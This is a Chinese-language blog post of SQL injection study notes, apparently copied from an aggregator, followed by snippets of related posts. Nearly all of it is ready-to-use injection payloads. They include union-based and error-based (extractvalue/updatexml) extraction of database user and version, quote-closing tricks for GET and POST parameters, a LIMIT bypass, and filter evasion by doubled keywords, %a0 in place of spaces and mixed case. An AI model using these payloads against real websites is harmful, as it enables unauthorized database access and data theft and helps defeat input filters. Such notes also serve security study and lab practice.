2. 程式人生 > >SQL注入筆記05:利用和繞過

SQL注入筆記05:利用和繞過

阿新 發佈:2018-12-14

1、利用當前頁面排版:     如id=1有資料而id=0無資料,則可構造資訊?id=0 union select 1,2,3,user(),version()#

2、利用報錯資訊:     1.extractvalue()     select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

    2.updatexml()     select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

3、利用閉合繞過'、"、)等,不使用註釋符,保持SQL語句完整:     1、GET:select * from user where id>"$id" order by id DESC limit 0,1;     ?id=1" union select 1,2,3 where "1"="1 //and "1"="1,and "1也行

    2、POST:select * from user where username="$u" and password="$p";     username:可使用盲注,admin and length(user())>1 and "1"="1 // and優先順序比or高     password:因為是最後一個引數,所以方法多多,可union、and、or等

4、繞過limit 0,1:     ?id=0 union select user(),version(),3 union select 1,2,3     id=0:為空資料,select 1,2,3:用以繞過limit 0,1,看引數情況select 1,2,3可以為select 1,2,'3、"3、('3、("3等

5、繞過or和and遮蔽:     使用雙寫oorr、aanndd或者&&、||(URL上使用需轉碼%26%26、%7c%7c)

6、繞過空格和註釋遮蔽     URL裡使用%a0代替空格,使用閉合代替註釋     ?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3

7、繞過union和select遮蔽     黑名單:uNion、sElect等等

相關推薦

SQL注入筆記05利用繞過

1、利用當前頁面排版:     如id=1有資料而id=0無資料,則可構造資訊?id=0 union select 1,2,3,user(),version()# 2、利用報錯資訊:     1.ex

SQL注入筆記02基於不同引數型別的注入

數字型 $id=$_GET['x'] Select * from news where id=$id 如:?x=1->Select * from news where id=1 注入更改:無 字

SQL注入筆記03盲注攻擊

普通聯合注入和盲注的區別 普通注入:效率高,相容性差 盲注:效率低,相容性強 工具採用的基本都為盲注及其他注入 ********************************************************基於時間延遲的盲注攻擊:***********

SQL注入技巧拓展】————4、高階SQL注入混淆繞過

【0×01】 – 簡介 大家好,這是一篇致力於文件化我們所從事的高階SQL注入技術的文章。 本文將要揭示能用於現實CMSs和WAFs程式中的高階繞過技術和混淆技術。文中所提到的SQL注入語句僅僅是一些繞過保護的方法。還有一些其他的技術能用於攻擊WEB程式,但是很不幸我們不能告訴你,因為它們就是0

高階SQL注入混淆繞過

內容 ############# ######################## 【0×01】 – 簡介 ######################## 大家好,這是一篇致力於文件化我們所從事的高階SQL注入技術的文章。 本文將要揭示能用於現實CMSs和WA

SQL高階注入混淆繞過

轉:【0×01】 -過濾規避(Mysql)########################本節將闡述基於PHP和MySQL的過濾規避行為以及如何繞過過濾。過濾規避是一種用來防止SQL注入的技術。這種技術可以用SQL函式,關鍵詞過濾或者正則表示式完成。這就意味著過濾規避嚴重依賴

SQL 注入基礎系列2——利用 SQL 漏洞繞過登入驗證

DVWA->SQL Injection //後臺sql語句 select * from users where username='$name' and password='$pwd'; 當查詢到資料表中存在同時滿足 username 和 password 欄位的資料時,會返回登入成功

C++筆記(5)繼承多態代碼實現

c++筆記 esp 變量 main style cnblogs radius 區分 fine Shape.h 1 #ifndef SHAPE_H 2 #define SHAPE_H 3 #include<string> 4 using std::str

MYSQL學習筆記日期時間函數

div content minute name top fonts table hmm 指定 MYSQL學習筆記三:日期和時間函數 1. 獲取當前日期的函數和獲取當前時間的函數 /*獲取當前日期的函數和獲取當前時間的函數。將日期以‘YYYY-MM-DD‘或者’YYYYM

SQL課堂筆記--數據操縱函數

進制 bre 優秀 服務器名稱 符號 mar 布爾表達式 when 聲明 2017.11.17 七.數據的插入,更新和刪除: 1.向表中插入數據: 使用insert語句插入 傳統的insert語句基本語法格式: insert into 表名 valu

python學習筆記05貪吃蛇遊戲代碼

Qt學習筆記2QMainWindowQWidget的區別

在Qt工程建立時,Qt Widget Application模板下提供了不同的父類繼承。 這裡,主要分析一下QMainWindow和QWidget的區別。 建立工程 分別以QMainWindow和QWidget為基類建立工程,工程建立完成後,如下圖所示: Qt會自動建

Python學習筆記1數值字串

Python旅程第一站:     Python數值運算:       type( ) 列印型別 四種基本型別:int, float, str, bool   round( )  取整,四捨五入  

Python學習筆記1數值字符串

分享圖片 bsp rep 數值運算 round 取整 float 分享 基本類型 Python旅程第一站: Python數值運算: type( ) 打印類型 四種基本類型:int, float, str, bool round( ) 取整,四舍五

SQL注入奇巧淫技——利用DNSLOG獲取看不到的資訊

對於sql盲注,常見的方法就是二分法去一個個猜,但是這樣的方法麻煩不說,還很容易因為資料請求頻繁導致被ban,所以可以將select到的資料傳送給一個url,利用dns解析產生的記錄日誌來檢視資料。 DNS在解析的時候會留下日誌,咱們這個就是讀取多級域名的解析日誌,來獲取資訊 簡單來說就

Cris 的 Python 資料分析筆記 05Pandas 資料讀取,索引,切片,計算,列整合,過濾,最值

Pandas 資料讀取,索引,切片,計算,列整合,過濾,最值 文章目錄 Pandas 資料讀取,索引,切片,計算,列整合,過濾,最值 1. read_csv 函式 2. DataFrame 資料結構的常用

springcloud學習筆記利用Feign編寫客戶消費端

Feign 在上一篇筆記中,我們在消費者端使用restemplate的方式遠端消費服務,這樣寫雖然可以,但是卻與我們其它的程式碼有點格格不入,那麼通過feign,一個http客戶端庫,可以做到使用HTTP請求遠端服務時能與呼叫本地方法一樣的編碼體驗,與我們的客戶端程式碼看起來融為一體。

SQL語句基礎1建立刪除資料庫,建表,插入資料並加入適當約束

1.建立圖書管理資料庫 create database bookManager on (     name=bookManager_data,     filename='D:\SQL\bookManager_data.mdf',     size=5MB,     maxs

Sql 注入詳解寬位元組注入+二次注入

sql注入漏洞 原理:由於開發者在編寫操作資料庫程式碼時,直接將外部可控引數拼接到sql 語句中,沒有經過任何過濾就直接放入到資料庫引擎中執行了。 攻擊方式: (1) 許可權較大時,直接寫入webshell 或者直接執行系統命令 (2) 許可權較小時,通過注入獲得管理

Google SQL 注入搜尋列表2018最新版

這是一個Google注入查詢列表(傻瓜式),更新於2018年;根據一些關鍵字和URL結構,可批量查詢出存在安全隱患的站點。 可以用來搜尋境外的站點來進行SQL注入練習和學習使用,切勿未授權對國內站點進行滲透測試。 SQL注入是一種攻擊者利用未經驗證的輸